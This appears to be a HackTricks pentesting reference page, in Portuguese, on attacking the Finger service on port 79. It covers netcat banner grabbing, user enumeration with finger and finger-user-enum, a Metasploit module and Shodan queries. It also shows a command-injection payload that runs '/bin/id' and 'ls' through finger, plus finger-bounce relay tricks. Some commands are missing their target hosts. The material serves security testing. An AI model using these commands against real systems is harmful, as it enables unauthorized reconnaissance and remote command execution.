## **Informações Básicas** O **Finger** é um programa que você pode usar para encontrar informações sobre usuários de computador. Geralmente, ele lista o nome de login, o nome completo e possivelmente outros detalhes sobre o usuário que você está consultando. Esses detalhes podem incluir a localização do escritório e o número de telefone (se conhecido), tempo de login, tempo ocioso, hora em que o e-mail foi lido pela última vez e os arquivos de plano e projeto do usuário. **Porta padrão:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **Enumeração** ### **Banner Grabbing/Conexão básica** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **Enumeração de usuários** A enumeração de usuários é uma técnica usada para obter informações sobre os usuários de um sistema. O comando `finger` pode ser usado para obter informações sobre os usuários em um sistema remoto. O comando `finger` pode ser usado para obter informações como nome de usuário, diretório inicial, último login, entre outras informações. Essas informações podem ser usadas para realizar ataques de força bruta ou ataques de phishing. É importante que os administradores de sistemas restrinjam o acesso ao comando `finger` para evitar a enumeração de usuários. ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` Alternativamente, você pode usar o **finger-user-enum** do [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), alguns exemplos: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap executar um script para fazer uso de scripts padrão** ### Metasploit usa mais truques do que o Nmap ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 USER` ## Execução de Comandos ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [Utilize um sistema como um relé de finger](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ```
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 - Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! - Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) - Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) - **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** - **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.